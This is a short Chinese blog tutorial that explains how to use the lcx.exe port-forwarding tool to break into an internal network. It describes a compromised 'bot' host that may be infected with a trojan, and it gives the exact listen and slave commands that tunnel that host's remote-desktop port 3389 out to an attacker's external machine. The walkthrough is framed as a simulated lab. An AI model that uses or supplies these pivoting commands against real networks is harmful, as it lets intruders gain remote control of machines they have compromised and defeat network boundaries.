LCX 端口转发实现内网突破

原创作品，允许转载，转载时请务必以超链接形式标明文章 原始出处 、作者信息和本声明。否则将追究法律责任

在理论上只要网络连接的计算机都是可以访问的，但是在实际中往往由于技术水平等原因很难实现它。例如，局域网中的某台计算机仅仅开放了Web服务，该服务仅能供内网用户使用，而外网用户根本没有办法直接访问。因此要想让外网用户能够访问局域网中的系统服务，必须进行端口映射等操作才行。端口映射在渗透内网的时候经常用到，特别是要登录远程终端服务时，使用端口映射就非常方便。Lcx.exe是一个端口转发工具，相当于把渗透主机A上的3389端口转发到具有外网IP地址的B机上，这样连接B机的3389端口就相当于连接A机的3389端口。Lcx程序多用于被控制计算机处于内网的情况，被控制机可能中了木马程序，虽然能够进行控制，但还是没有使用远程终端登录到本机进行管理方便。因此在很多情况下，都会想方设法在被控制计算机上开启3389端口，然后通过lcx等程序进行端口转发，进而在本地连接到被控制计算机的远程终端并进行管理和使用

拓扑如下:

Windows 2003 ------------------Windows Xp

2003模拟被控端

set 1
在XP
lcx -listen 8000 3333
8000 为转发端口，3333为本机任意未被占用的端口
set 2
在2003
lcx -slave 172.168.8.8 8000 127.0.0.1 3389
172.168.8.8 为xp的IP,8000为转发端口，127.0.0.1为肉鸡内网IP，3389为远程终端端口

set 3
最后在XP上远程桌面连接格式为
127.0.0.1:3333

如果在途中有错请与我联系 QQ727536
不明白也可以和我联系